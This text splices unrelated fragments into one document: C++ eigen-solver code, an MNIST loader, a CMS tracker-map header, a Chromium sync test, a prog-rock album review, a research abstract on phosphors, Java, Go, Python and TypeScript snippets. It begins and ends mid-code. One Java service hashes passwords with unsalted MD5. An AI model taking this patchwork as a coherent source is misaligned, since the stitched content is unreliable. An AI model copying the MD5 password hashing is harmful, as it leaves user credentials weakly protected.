x; for(iter = 0;iter<max_iter;iter++) { if(i>0 && !ray) { // project-out existing modes for(int j = 0;j<i;j++) { const VectorXS u = U.col(j); y = (y - u*u.dot(B*y)/u.dot(B * u)).eval(); } } // normalize x = y/sqrt(y.dot(B*y)); // current guess at eigen value sigma = x.dot(A*x)/x.dot(B*x); //x *= sigma>0?1.:-1.; Scalar err_prev = err; err = (A*x-sigma*B*x).array().abs().maxCoeff(); if(err<conv) { break; } if(ray || err<tol) { eff_sigma = sigma; ray = true; } Scalar tikhonov = std::abs(eff_sigma)<1e-12?1e-10:0; switch(type) { default: assert(false && "Not supported"); break; case EIGS_TYPE_SM: { SimplicialLDLT<SparseMatrix<Scalar> > solver; const SparseMatrix<Scalar> C = A-eff_sigma*B+tikhonov*B; //mw.save(C,"C"); //mw.save(eff_sigma,"eff_sigma"); //mw.save(tikhonov,"tikhonov"); solver.compute(C); switch(solver.info()) { case Eigen::Success: break; case Eigen::NumericalIssue: cerr<<"Error: Numerical issue."<<endl; return false; default: cerr<<"Error: Other."<<endl; return false; } const VectorXS rhs = B*x; y = solver.solve(rhs); //mw.save(rhs,"rhs"); //mw.save(y,"y"); //mw.save(x,"x"); //mw.write("eigs.mat"); //if(i == 1) //return false; break; } } } if(iter == max_iter) { cerr<<"Failed to converge."<<endl; return false; } if(i==0 || (S.head(i).array()-sigma).abs().maxCoeff()>1e-14) { U.col(i) = x; S(i) = sigma; i++; if(i == k) { break; } }else { // restart with new random guess. 
cout<<"RESTART!"<<endl; } } // finally sort VectorXi I; igl::sort(S,1,false,sS,I); sU = igl::slice(U,I,2); sS /= rescale; sU /= sqrt(rescale); return true; } #ifdef IGL_STATIC_LIBRARY // Explicit template specialization template bool igl::eigs<double, double, Eigen::Matrix<double, -1, -1, 0, -1, -1>, Eigen::Matrix<double, -1, 1, 0, -1, 1> >(Eigen::SparseMatrix<double, 0, int> const&, Eigen::SparseMatrix<double, 0, int> const&, unsigned long, igl::EigsType, Eigen::PlainObjectBase<Eigen::Matrix<double, -1, -1, 0, -1, -1> >&, Eigen::PlainObjectBase<Eigen::Matrix<double, -1, 1, 0, -1, 1> >&); #ifdef WIN32 template bool igl::eigs<double, double, Eigen::Matrix<double,-1,-1,0,-1,-1>, Eigen::Matrix<double,-1,1,0,-1,1> >(Eigen::SparseMatrix<double,0,int> const &,Eigen::SparseMatrix<double,0,int> const &,unsigned long long, igl::EigsType, Eigen::PlainObjectBase< Eigen::Matrix<double,-1,-1,0,-1,-1> > &, Eigen::PlainObjectBase<Eigen::Matrix<double,-1,1,0,-1,1> > &); #endif #endif
def fetch_mnist():
    data_path = check_fetch_mnist()
    f = gzip.open(data_path, 'rb')
    try:
        train_set, valid_set, test_set = pickle.load(f, encoding="latin1")
    except TypeError:
        train_set, valid_set, test_set = pickle.load(f)
    f.close()
    return train_set, valid_set, test_set
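A usage sketch; the split sizes below follow the canonical mnist.pkl.gz layout and are stated as an assumption rather than something this function guarantees:

# Each split is a (data, labels) pair of NumPy arrays.
train_set, valid_set, test_set = fetch_mnist()
train_X, train_y = train_set
print(train_X.shape)  # expected (50000, 784) for the canonical pickled MNIST
print(train_y[:10])   # integer class labels 0-9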
#ifndef DQM_TRACKERREMAPPER_PHASE1PIXELMAPS_H
#define DQM_TRACKERREMAPPER_PHASE1PIXELMAPS_H

#include "TH2Poly.h"
#include "TGraph.h"
#include "TH1.h"
#include "TH2.h"
#include "TStyle.h"
#include "TCanvas.h"

#include <fmt/printf.h>
#include <fstream>
#include <boost/tokenizer.hpp>
#include <boost/range/adaptor/indexed.hpp>

#include "FWCore/ParameterSet/interface/FileInPath.h"
#include "FWCore/MessageLogger/interface/MessageLogger.h"
#include "CalibTracker/StandaloneTrackerTopology/interface/StandaloneTrackerTopology.h"

#ifndef PHASE1PIXELMAP_STANDALONE
#define LOGDEBUG(x) LogDebug(x)
#else
#define LOGDEBUG(x) std::cout << x << ": "
#endif

using indexedCorners = std::map<unsigned int, std::pair<std::vector<float>, std::vector<float>>>;

/*--------------------------------------------------------------------
/ Ancillary class to build pixel phase-1 tracker maps
/--------------------------------------------------------------------*/
class Phase1PixelMaps {
public:
  Phase1PixelMaps(const char* option)
      : m_option{option},
        m_isBooked{std::make_pair(false, false)},
        m_knownNames{{}},
        m_trackerTopo{StandaloneTrackerTopology::fromTrackerParametersXMLFile(
            edm::FileInPath("Geometry/TrackerCommonData/data/PhaseI/trackerParameters.xml").fullPath())} {
    // set the rescale to true by default
    m_autorescale = true;

    // store the files in path for the corners (BPIX)
    for (unsigned int i = 1; i <= 4; i++) {
      m_cornersBPIX.push_back(edm::FileInPath(Form("DQM/SiStripMonitorClient/data/Geometry/vertices_barrel_%i", i)));
    }

    // store the files in path for the corners (FPIX)
    for (int j : {-3, -2, -1, 1, 2, 3}) {
      m_cornersFPIX.push_back(edm::FileInPath(Form("DQM/SiStripMonitorClient/data/Geometry/vertices_forward_%i", j)));
    }
  }

  ~Phase1PixelMaps() = default;

  // opt out of automatic rescaling
  inline void setNoRescale() { m_autorescale = false; }

  // set option, but only if not already set
  void resetOption(const char* option);

  // book them all
  void book(const std::string& currentHistoName, const char* what, const char* zaxis);

  // booking methods
  void bookBarrelHistograms(const std::string& currentHistoName, const char* what, const char* zaxis);
  void bookForwardHistograms(const std::string& currentHistoName, const char* what, const char* zaxis);

  // fill them all
  void fill(const std::string& currentHistoName, unsigned int id, double value);

  // filling methods
  void fillBarrelBin(const std::string& currentHistoName, unsigned int id, double value);
  void fillForwardBin(const std::string& currentHistoName, unsigned int id, double value);

  // beautification methods
  void beautifyAllHistograms();
  void setBarrelScale(const std::string& currentHistoName, std::pair<float, float> extrema);
  void setForwardScale(const std::string& currentHistoName, std::pair<float, float> extrema);

  // drawing methods
  void drawBarrelMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr);
  void drawForwardMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr);
  void drawSummaryMaps(const std::string& currentHistoName, TCanvas& canvas, const char* drawOption = nullptr);

private:
  Option_t* m_option;
  bool m_autorescale;
  std::pair<bool, bool> m_isBooked;
  std::vector<std::string> m_knownNames;
  TrackerTopology m_trackerTopo;

  std::map<uint32_t, std::shared_ptr<TGraph>> bins, binsSummary;
  std::map<std::string, std::vector<std::shared_ptr<TH2Poly>>> pxbTh2PolyBarrel;
  std::map<std::string, std::shared_ptr<TH2Poly>> pxbTh2PolyBarrelSummary;
  std::map<std::string, std::vector<std::shared_ptr<TH2Poly>>> pxfTh2PolyForward;
  std::map<std::string, std::shared_ptr<TH2Poly>> pxfTh2PolyForwardSummary;

  std::vector<edm::FileInPath> m_cornersBPIX;
  std::vector<edm::FileInPath> m_cornersFPIX;

  const indexedCorners retrieveCorners(const std::vector<edm::FileInPath>& cornerFiles, const unsigned int reads);

  // called by the booking methods
  void bookBarrelBins(const std::string& currentHistoName);
  void bookForwardBins(const std::string& currentHistoName);

  // graphics
  void makeNicePlotStyle(TH1* hist);
  void adjustCanvasMargins(TVirtualPad* pad, float top, float bottom, float left, float right);
  void rescaleAllBarrel(const std::string& currentHistoName);
  void rescaleAllForward(const std::string& currentHistoName);
};

#endif
// Verifies that managed bookmarks (installed by policy) don't get synced. IN_PROC_BROWSER_TEST_F(TwoClientBookmarksSyncTest, ManagedBookmarks) { policy_provider_.SetDefaultReturns( true, true); policy::PushProfilePolicyConnectorProviderForTesting(&policy_provider_); ASSERT_TRUE(SetupSync()) << "SetupSync() failed."; const BookmarkNode* managed_node0 = GetManagedNode(0); ASSERT_TRUE(managed_node0->children().empty()); ASSERT_FALSE(managed_node0->IsVisible()); const BookmarkNode* managed_node1 = GetManagedNode(1); ASSERT_TRUE(managed_node1->children().empty()); ASSERT_FALSE(managed_node1->IsVisible()); const BookmarkNode* bar_node0 = GetBookmarkBarNode(0); ASSERT_TRUE(bar_node0->children().empty()); ASSERT_TRUE(bar_node0->IsVisible()); const BookmarkNode* bar_node1 = GetBookmarkBarNode(1); ASSERT_TRUE(bar_node1->children().empty()); ASSERT_TRUE(bar_node1->IsVisible()); const GURL google_url("http://www.google.com"); ASSERT_NE(nullptr, AddURL(0, "Google", google_url)); ASSERT_TRUE(BookmarksMatchChecker().Wait()); ASSERT_EQ(1u, bar_node0->children().size()); ASSERT_EQ(1u, bar_node1->children().size()); base::Value bookmark(base::Value::Type::DICTIONARY); bookmark.SetStringKey("name", "Managed bookmark"); bookmark.SetStringKey("url", "youtube.com"); base::Value list(base::Value::Type::LIST); list.Append(std::move(bookmark)); policy::PolicyMap policy; policy.Set(policy::key::kManagedBookmarks, policy::POLICY_LEVEL_MANDATORY, policy::POLICY_SCOPE_USER, policy::POLICY_SOURCE_CLOUD, std::move(list), nullptr); policy_provider_.UpdateChromePolicy(policy); base::RunLoop().RunUntilIdle(); ASSERT_NE(nullptr, AddURL(0, "Google 2", google_url)); ASSERT_TRUE(BookmarksMatchChecker().Wait()); ASSERT_THAT(GetBookmarkBarNode(0)->children(), Contains(IsUrlBookmarkWithTitleAndUrl("Google 2", google_url))); EXPECT_FALSE(GetSyncService(0)->HasUnrecoverableError()); EXPECT_FALSE(GetSyncService(1)->HasUnrecoverableError()); ASSERT_EQ(1u, managed_node0->children().size()); ASSERT_TRUE(managed_node0->IsVisible()); EXPECT_EQ(GURL("http://youtube.com/"), managed_node0->children().front()->url()); ASSERT_EQ(0u, managed_node1->children().size()); }
Anderson Ponty Band – Better Late Than Never Article by: Tony Colvill Somewhere around 1980, Jon Anderson approached Jean-Luc Ponty with a view to a collaboration. Now, over thirty years later, the man from Accrington and the man from Avranches, two very different environments, have finally got together. The album was recorded live in Aspen, Colorado, which goes some way to explain the sound and feel, and then tweaked in the studio. I looked forward to this album when I first heard of its planned release, and overall it has not disappointed. I always considered Yes to have a jazz element, particularly in their early work, and combining this with former Frank Zappa musician and credible artiste in his own right Jean-Luc Ponty seemed to me to create an interesting combination.  So let’s get the gripes out of the way. Just two really; in an album of covers of Yes material, Jean-Luc material and a couple of new bits, it’s not bad but although a cover must bring something new to a song it should not slaughter what are essentially sacred cows. So what, in my view, went to the abattoir? Firstly, Time and a Word, a song with a lot of feeling, pathos if you will, all the sentiment and meaning is lost in a cod reggae version. Don’t get me wrong, in a live environment this may actually work. I recall seeing Fairport Convention doing a reggae style Matty Groves live and it was really enjoyable, but, for me, this does not. Professionally done with good musicianship, but the heart of the song, gone. Similarly, Wondrous Stories, a song which when performed by Yes (and Jon) is just plain enjoyable. The album opens with an intro, this is the band statement and as such delivers some promise before moving into the first track, One in the Rhythm of Hope, a blending of J-LP’s Rhythm of Hope and “Yesisms”. It works well, Anderson’s voice reaches its heights and Ponty’s violin provides a jazz feel. This is much a pattern for the album, Yes revisited, a merging of Yes and J-LP with a few new bits. A for Aria is a lovely piece, it has the feeling that the reggae version of Time and A Word has lost to my ears. Jon, although the voice is older, can still sound as powerful and emotive as ever. Other tracks hit these high points too, most markedly Listening with Me and Soul Eternal. Owner of a Lonely Heart works for me, it has had some of the eighties bombast removed but still manages to retain the shape and feeling of the original, violin substituting for the guitar work of Trevor Rabin does not devalue the song so a thumbs up from me on this one. Infinite Mirage blends the rock and jazz influences but also manages a poppy feel with a distinct live element. Overall it is a strange album, part rock, part jazz, part lounge, an occasional indulgence (eek!), some even meriting owning, especially in the current presence of a wayward studio Yes. Soul Eternal is what Wonderous Stories could have been, a track filled with hope and the expectations that I have of a classic Yes track. My perspective on this is mainly as a Yes rock fan, and much as I love my jazz too, I have not exposed myself to a lot of J-LP’s back catalogue, I will however make it a mission to explore. And You & I is almost a straight Yes cover, if covering your own material is in fact a cover. It’s fine, it works, and nothing of its essence is lost. Unlike the jazz lounge Wonderous Stories, not far from Alas Smith & Jones and now the tears of laughter fall. 
Though currently sat in the shed with a glass of merlot and Wonderous Stories playing, it is not as offensive as on first listen. Merlot mellows the savage ear… Renaissance of the Sun is one of the jointly composed pieces and it’s very very nice. First sound of the audience. Yup, the merlot is working, feeling very chilled with this piece, can recommend it for late night chilling. Roundabout is a mad and crazy jazzed up version of the Yes classic, this is what a musical conglomeration should be, a little from both, losing nothing and adding a different edge to get close to. And it would seem that the band finally express themselves freely. Long time coming for a live recording. I See You Messenger and the last track, New New World, show the true potential of this project and I do hope they have another go but with more new material. It was recorded live, and I wonder if the DVD that accompanies the deluxe version of the album gives more life to the performance, in particular those two tracks that disappoint me. Perhaps with movement and cheesy grins they become more than party pieces. Sadly, the review copy is just audio so I may never know. The production values are good, something that seemed to be missing from the last Yes studio album. I think that if you like Jon with Yes, Jean-Luc Ponty and a little jazz orientated music, yours to own will be no disgrace. Some tracks will happily go on to a prog mix for the car, others…. If this is the first of a few from Anderson Ponty then it is a good start. 30 years in the making, but a good start. TRACK LISTING 01. Band Intro (1:17) 02. One in the Rhythm of Hope (4:34) 03. A for Aria (3:22) 04. Owner of a Lonely Heart (5:04) 05. Listening with Me (5:39) 06. Time and a Word (5:30) 07. Infinite Mirage (3:48) 08. Soul Eternal (4:58) 09. Wonderous Stories (4:01) 10. And You and I (3:00) 11. Renaissance of the Sun (6:36) 12. Roundabout (5:27) 13. I See You Messenger (3:50) 14. New New World (3:46) Total time – 60:52 MUSICIANS Jon Anderson – Vocals, Guitar Jean-Luc Ponty – Violin Jamie Glaser – Guitars Wally Minko – Keyboards Baron Browne – Bass Rayford Griffin – Drums & Percussion ADDITIONAL INFO Record Label: Ear Music Year Of Release: 2015 LINKS Anderson Ponty Band: Website | Facebook Jon Anderson: Website | Facebook Jean-Luc Ponty: Website
def aggregate(self, inputs, index): return scatter(inputs, index, dim=self.node_dim, reduce=self.aggr)
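For context, a minimal sketch of what the scatter call above does, assuming the torch_scatter-style semantics used by PyTorch Geometric's MessagePassing (toy tensors, reduce='sum'):

import torch
from torch_scatter import scatter

# Three messages destined for two target nodes; index says which node gets which message.
inputs = torch.tensor([[1.0], [2.0], [3.0]])
index = torch.tensor([0, 0, 1])
out = scatter(inputs, index, dim=0, reduce='sum')
print(out)  # tensor([[3.], [3.]]) -- messages 1+2 land on node 0, message 3 on node 1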
package com.july.springboot.service.impl;

import com.july.springboot.mapper.UserMapper;
import com.july.springboot.model.entity.User;
import com.july.springboot.model.json.UserJson;
import com.july.springboot.service.UserService;
import com.july.springboot.util.PasswordUtil;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

/**
 * Created by Noageir
 * Date: 2017/7/21.
 */
@Service
public class UserServiceImpl implements UserService {

    @Autowired
    private UserMapper userMapper;

    @Override
    public boolean addUserInfo(User user) {
        // TODO: implement the registration endpoint; the password is hashed but not yet persisted.
        String passWd = user.getPassWord();
        user.setPassWord(PasswordUtil.EncoderByMd5(passWd));
        return false;
    }

    @Override
    public UserJson queryUserInfo(User user) {
        return userMapper.queryUserInfo(user);
    }
}
import { Directive } from '@angular/core';
import { Object3D } from 'three';
import { GLTF, GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader';
import { ThLoader } from './ThLoader';

@Directive({
  selector: '[loadGLTF]'
})
// eslint-disable-next-line @angular-eslint/directive-class-suffix
export class ThGLTFLoader extends ThLoader<GLTF> {
  public loaderFn = async (
    input?: string,
    onProgress?: (progress: ProgressEvent) => void,
    onLoaded?: (res: GLTF) => void
  ): Promise<Object3D> => {
    if (!input) {
      throw new Error('missing input url');
    }
    const loader = new GLTFLoader();
    const result: GLTF = await loader.loadAsync(input, onProgress);
    if (onLoaded) {
      onLoaded(result);
    }
    return result.scene;
  };
}
// reponame: mctofu/homek
package config

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"os"
	"path"

	"github.com/mctofu/homekit/client"
)

// ControllerConfig details a controller and its pairings
type ControllerConfig struct {
	Name              string
	DeviceID          string
	PublicKey         []byte
	PrivateKey        []byte
	AccessoryPairings []*AccessoryPairing
}

// AccessoryPairing details a paired accessory
type AccessoryPairing struct {
	Name             string
	DeviceName       string
	Model            string
	DeviceID         string
	PublicKey        []byte
	IPConnectionInfo client.IPConnectionInfo
}

// ReadControllerConfig reads the ControllerConfig for a controller with the given name
// stored under the configPath directory
func ReadControllerConfig(configPath string, name string) (*ControllerConfig, error) {
	data, err := ioutil.ReadFile(path.Join(configPath, name+".json"))
	if err != nil {
		return nil, err
	}

	var cfg ControllerConfig
	if err := json.Unmarshal(data, &cfg); err != nil {
		return nil, fmt.Errorf("parse config: %v", err)
	}

	return &cfg, nil
}

// SaveControllerConfig writes the ControllerConfig for a controller with the given name
// under the configPath directory. An error is returned if a config for the controller
// already exists unless the overwrite flag is set.
func SaveControllerConfig(configPath string, cfg *ControllerConfig, overwrite bool) error {
	filePath := path.Join(configPath, cfg.Name+".json")

	if !overwrite {
		if _, err := os.Stat(filePath); err == nil {
			return fmt.Errorf("%s already exists", filePath)
		} else if !os.IsNotExist(err) {
			return err
		}
	}

	if err := os.MkdirAll(configPath, 0700); err != nil {
		return err
	}

	var output bytes.Buffer
	encoder := json.NewEncoder(&output)
	encoder.SetIndent("", "  ")
	if err := encoder.Encode(cfg); err != nil {
		return err
	}

	if err := WriteConfig(filePath, output.Bytes()); err != nil {
		return err
	}

	return nil
}

// WriteConfig writes data to path but first writes it to a temporary file
// to avoid errors where the write fails & the data from the original config
// is lost.
func WriteConfig(path string, data []byte) error {
	tempPath := path + ".new"
	if err := ioutil.WriteFile(tempPath, data, 0600); err != nil {
		return fmt.Errorf("write temp: %v", err)
	}

	if _, err := os.Stat(path); !os.IsNotExist(err) {
		if err := os.Remove(path); err != nil {
			return fmt.Errorf("remove existing: %v", err)
		}
	}

	if err := os.Rename(tempPath, path); err != nil {
		return fmt.Errorf("rename: %v", err)
	}

	return nil
}
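A brief usage sketch of the save/read round trip exposed above (the path, name, and device ID are illustrative):

// Hypothetical caller: persist a controller config, then read it back.
func example() error {
	cfg := &ControllerConfig{Name: "living-room", DeviceID: "AA:BB:CC:DD:EE:FF"}
	if err := SaveControllerConfig("/home/user/.homekit", cfg, false); err != nil {
		return err
	}
	loaded, err := ReadControllerConfig("/home/user/.homekit", "living-room")
	if err != nil {
		return err
	}
	fmt.Println(loaded.Name) // "living-room"
	return nil
}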
Characterization of zinc magnesium stannate phosphor fine particles synthesized by electromagnetic wave heating

Electromagnetic wave heating has drawn much attention in materials processing. The method is applicable to materials that exhibit dielectric loss in the corresponding wavelength region. Its merits are a quick response and uniform heating, owing to internal heat generation. These features suggest that electromagnetic wave heating can facilitate control of particle size in the synthesis of phosphors. It has also been reported that stannates are easily synthesized by microwave heating. Among these compounds, zinc stannate (Zn2SnO4) is a promising host material for phosphors in FED and EL devices because of its semiconducting electrical properties. In the present study, we synthesized fine particles of Mn2+-doped (Zn, Mg)SnO4 phosphor using the 28 GHz high-power electromagnetic wave irradiation system at the FIR Center of the University of Fukui. Properties of the samples synthesized by millimeter-wave heating are compared with those synthesized by electric furnace heating. On the basis of these comparisons, the advantages of electromagnetic heating for phosphor development are identified.
#!/usr/bin/env python
import os
import re

PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)

if __name__ == '__main__':
    cf_template_file = "%s/cloudformation/{{ cookiecutter.cloudformation_template_name }}.yml.tpl" % PROJECT_DIRECTORY
    cf_template_name = "{{ cookiecutter.cloudformation_template_name }}"
    cf_template_description = "{{ cookiecutter.cloudformation_template_description }}"
    cf_template_version = "{{ cookiecutter.version }}"

    pattern = re.compile(r"\%\%(\S+)\%\%")

    with open(cf_template_file, "r") as f:
        lines = f.readlines()

    with open(cf_template_file, "w") as f:
        for l in lines:
            m = pattern.search(l)
            if m and m.group() == "%%cookiecutter.cloudformation_template_name%%":
                f.write(pattern.sub(cf_template_name, l))
            elif m and m.group() == "%%cookiecutter.cloudformation_template_description%%":
                f.write(pattern.sub(cf_template_description, l))
            elif m and m.group() == "%%cookiecutter.version%%":
                f.write(pattern.sub(cf_template_version, l))
            else:
                # No recognized placeholder: keep the line unchanged
                # (previously, lines with an unrecognized %%...%% token were dropped).
                f.write(l)
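To make the %%…%% replacement concrete, here is a small standalone demonstration of the same regex on a made-up template line:

import re

pattern = re.compile(r"\%\%(\S+)\%\%")
line = "Description: %%cookiecutter.cloudformation_template_description%%\n"

m = pattern.search(line)
print(m.group())                         # %%cookiecutter.cloudformation_template_description%%
print(pattern.sub("Demo stack", line), end="")  # Description: Demo stack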
import os
import re

import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

# Project-internal dependencies; import paths assumed, adjust to the package layout:
# from igf_data.task_tracking.igf_slack import IGF_slack
# from igf_data.utils.fileutils import get_temp_dir


class IgfBasicSlackBot:
    '''
    A basic slack bot for IGF specific operations

    required params:
    slack_config_json: A json file containing slack api keys
    project_data_file: A csv file containing project data

    usage:
    - create bot
      bot = IgfBasicSlackBot(slack_config_json, project_data_file)
    - start bot
      bot.start_igfslackbot()
    '''
    def __init__(self, slack_config_json, project_data_file):
        self.project_data_file = project_data_file
        self.igf_slack = IGF_slack(slack_config=slack_config_json)  # create slack client instance

    @staticmethod
    def _get_project_status(project_igf_id, data_file, output_file):
        '''
        A static method for fetching project status

        required params:
        project_igf_id: A project igf id
        data_file: A csv file containing project data
        output_file: An output png filepath
        '''
        message = None
        data = pd.read_csv(data_file)
        data = data[data['project_igf_id'] == project_igf_id]
        if len(data.index) > 0:
            data = data.groupby(['sample_igf_id', 'seqrun_igf_id']).sum()
            data = data.reset_index(level=['seqrun_igf_id'])
            fig, ax = plt.subplots()
            ax = sns.barplot(data=data,
                             y='attribute_value',
                             x=data.index,
                             hue='seqrun_igf_id')
            # ax.legend(bbox_to_anchor=(1.8, 1))
            plt.xticks(fontsize=8, rotation=30)
            plt.savefig(output_file)
        else:
            message = 'project id {0} not found'.format(project_igf_id)
        return output_file, message

    @staticmethod
    def _calculate_reply(user_input, project_data):
        '''
        A static method for calculating a reply for the user input

        required params:
        user_input: A user input string from slack message
        project_data: A project data csv file
        '''
        file_plot = None
        # Expected message shape: "@botname key : value", e.g. "@bot project : IGFP001"
        pattern = re.compile(r'^<@\w+>(\s+)?(\S+)(\s+)?:(\s+)?(\S+)$')
        m = re.search(pattern, user_input)
        if m:
            key = m.group(2)
            value = m.group(5)
            if key.lower() == 'project':
                tmp_dir = get_temp_dir()
                file_plot, msg = IgfBasicSlackBot.\
                    _get_project_status(project_igf_id=value,
                                        data_file=project_data,
                                        output_file=os.path.join(tmp_dir, 'project_data.png'))
            else:
                msg = 'No option present for keyword {0}, available options are: project'.\
                      format(key)
        else:
            msg = 'No match found, available options are: project'
        return file_plot, msg

    @staticmethod
    def _parse_slack_output(slack_rtm_output, bot_id, channel_id):
        '''
        A static method for parsing slack realtime output

        required_params:
        slack_rtm_output: slack realtime stream
        bot_id: slack bot id
        channel_id: slack channel id
        '''
        if isinstance(slack_rtm_output, list) and \
           len(slack_rtm_output) > 0:
            for output in slack_rtm_output:
                if output and \
                   'text' in output and \
                   '@' + bot_id in output['text'] and \
                   channel_id in output['channel']:
                    yield output

    def start_igfslackbot(self):
        '''
        A method for starting the basic slackbot
        '''
        try:
            igf_slack = self.igf_slack
            if igf_slack.slackobject.rtm_connect():
                while True:
                    for output in self._parse_slack_output(
                            slack_rtm_output=igf_slack.slackobject.rtm_read(),
                            bot_id=igf_slack.slack_bot_id,
                            channel_id=igf_slack.slack_channel_id):
                        file_plot, message = self._calculate_reply(
                            user_input=output['text'],
                            project_data=self.project_data_file)
                        if message is None:
                            igf_slack.post_file_to_channel(filepath=file_plot,
                                                           thread_ts=output['ts'])
                        else:
                            igf_slack.post_message_to_channel_thread(message=message,
                                                                     thread_id=output['ts'])
        except KeyboardInterrupt:
            print('Stopped bot')
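A minimal launch script following the usage notes in the class docstring; both file paths below are placeholders, not files shipped with the project:

# slack_config.json and project_data.csv are placeholder names.
bot = IgfBasicSlackBot(
    slack_config_json='slack_config.json',
    project_data_file='project_data.csv')
bot.start_igfslackbot()  # blocks until interrupted; Ctrl+C prints 'Stopped bot'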
import { Connection } from 'typeorm';
import { Container } from 'typedi';
import { Fridge } from '../fridge/Fridge';
import { ShoppingList } from '../shoppinglist/ShoppingList';
import { User } from '../user/User';
import { getDeterministicString } from './getDeterministicString';

export async function createNewTestUser(connection: Connection = Container.get(Connection)) {
  if (!process.env.PASSWORDS_PEPPER) {
    process.env.PASSWORDS_PEPPER = '<PASSWORD>';
  }
  const users = connection.getRepository(User);
  const email = getDeterministicString() + '@example.com';
  const password = await User.hashPassword('password');
  const user = users.create({ email, password });
  user.fridge = Promise.resolve(new Fridge());
  user.shoppingList = Promise.resolve(new ShoppingList());
  await users.save(user);
  return user;
}
import {IoNode, RegisterIoNode, ListenersDeclaration, EventDispatcher} from '../../iogui.js';

const handlerFunction = () => {};

class IoNode1 extends IoNode {
  handler1Count = 0;
  handler1Detail?: string;
  static get Listeners(): ListenersDeclaration {
    return {
      'event1': 'handler1',
    };
  }
  handler1(event: CustomEvent) {
    this.handler1Count++;
    this.handler1Detail = event.detail;
  }
}
RegisterIoNode(IoNode1);

class IoNode2 extends IoNode1 {
  handler2Count = 0;
  handler3Count = 0;
  handler2Detail?: string;
  handler3Detail?: string;
  static get Listeners(): ListenersDeclaration {
    return {
      'event2': ['handler2', {capture: true}],
    };
  }
  handler2(event: CustomEvent) {
    this.handler2Count++;
    this.handler2Detail = event.detail;
  }
  handler3(event: CustomEvent) {
    this.handler3Count++;
    this.handler3Detail = event.detail;
  }
}
RegisterIoNode(IoNode2);

class IoNode3 extends IoNode2 {
  static get Listeners(): ListenersDeclaration {
    return {
      'event1': 'handler3',
      'event2': [handlerFunction, {passive: true}],
      'event3': handlerFunction
    };
  }
}
RegisterIoNode(IoNode3);

class TestDivEventDispatchElement extends HTMLElement {
  handler3Count = 0;
  handler3Detail?: string;
  handler3(event: CustomEvent) {
    this.handler3Count++;
    this.handler3Detail = event.detail;
  }
}
window.customElements.define('test-div-event-dispatch', TestDivEventDispatchElement);

export default class {
  run() {
    describe('EventDispatcher', () => {
      it('Should initialize with correct values', () => {
        const node = {} as IoNode;
        let eventDispatcher = new EventDispatcher(node);
        chai.expect(eventDispatcher.node).to.be.equal(node);
        chai.expect(eventDispatcher.protoListeners).to.be.eql({});
        chai.expect(eventDispatcher.propListeners).to.be.eql({});
        chai.expect(eventDispatcher.addedListeners).to.be.eql({});
        chai.expect(eventDispatcher.isEventTarget).to.be.eql(false);
        const element = document.createElement('div');
        eventDispatcher = new EventDispatcher(element);
        chai.expect(eventDispatcher.node).to.be.equal(element);
        chai.expect(eventDispatcher.protoListeners).to.be.eql({});
        chai.expect(eventDispatcher.propListeners).to.be.eql({});
        chai.expect(eventDispatcher.addedListeners).to.be.eql({});
        chai.expect(eventDispatcher.isEventTarget).to.be.equal(true);
      });
      it('Should initialize listeners from ProtoChain', () => {
        let node = new IoNode1();
        let eventDispatcher = new EventDispatcher(node);
        chai.expect(eventDispatcher.protoListeners).to.be.eql({
          event1: [[node.handler1]],
        });
        node = new IoNode2();
        eventDispatcher = new EventDispatcher(node);
        chai.expect(eventDispatcher.protoListeners).to.be.eql({
          event1: [[node.handler1]],
          event2: [[node.handler2, {capture: true}]]
        });
        node = new IoNode3();
        eventDispatcher = new EventDispatcher(node);
        chai.expect(eventDispatcher.protoListeners).to.be.eql({
          event1: [[node.handler1], [node.handler3]],
          event2: [[node.handler2, {capture: true}], [handlerFunction, {passive: true}]],
          event3: [[handlerFunction]]
        });
      });
      it('Should set property listeners correctly', () => {
        const node = new IoNode2();
        const eventDispatcher = new EventDispatcher(node);
        const handler4 = () => {};
        const handler5 = () => {};
        eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4});
        chai.expect(eventDispatcher.propListeners).to.be.eql({
          event3: [[node.handler3]],
          event4: [[handler4]]
        });
        eventDispatcher.applyPropListeners({'on-event5': ['handler3'], 'on-event6': [handler4]});
        chai.expect(eventDispatcher.propListeners).to.be.eql({
          event5: [[node.handler3]],
          event6: [[handler4]]
        });
        eventDispatcher.applyPropListeners({
          'on-event7': [node.handler3, {capture: true}],
          'on-event8': [handler5, {capture: true}]
        });
        chai.expect(eventDispatcher.propListeners).to.be.eql({
          event7: [[node.handler3, {capture: true}]],
          event8: [[handler5, {capture: true}]]
        });
        eventDispatcher.applyPropListeners({});
        chai.expect(eventDispatcher.propListeners).to.be.eql({});
      });
      it('Should add/remove listeners correctly', () => {
        const node = new IoNode2();
        const eventDispatcher = new EventDispatcher(node);
        const listener1 = () => {};
        const listener2 = () => {};
        eventDispatcher.addEventListener('event1', listener1);
        eventDispatcher.addEventListener('event1', listener2, {capture: true});
        chai.expect(eventDispatcher.addedListeners).to.be.eql({
          event1: [[listener1], [listener2, {capture: true}]]
        });
        eventDispatcher.removeEventListener('event1', listener1);
        chai.expect(eventDispatcher.addedListeners).to.be.eql({
          event1: [[listener2, {capture: true}]]
        });
        eventDispatcher.removeEventListener('event1');
        chai.expect(eventDispatcher.addedListeners).to.be.eql({});
      });
      it('Should dispatch added events', () => {
        const node = new IoNode2();
        const eventDispatcher = new EventDispatcher(node);
        let handler4Count = 0;
        const handler4 = () => {
          handler4Count++;
        };
        let handler5Count = 0;
        const handler5 = () => {
          handler5Count++;
        };
        eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4});
        eventDispatcher.addEventListener('event5', handler5);
        eventDispatcher.dispatchEvent('event1');
        eventDispatcher.dispatchEvent('event2');
        eventDispatcher.dispatchEvent('event3');
        eventDispatcher.dispatchEvent('event4');
        eventDispatcher.dispatchEvent('event5');
        chai.expect(node.handler1Count).to.be.equal(1);
        chai.expect(node.handler2Count).to.be.equal(1);
        chai.expect(node.handler3Count).to.be.equal(1);
        chai.expect(handler4Count).to.be.equal(1);
        chai.expect(handler5Count).to.be.equal(1);
        // Remove events
        eventDispatcher.applyPropListeners({'on-event4': handler4});
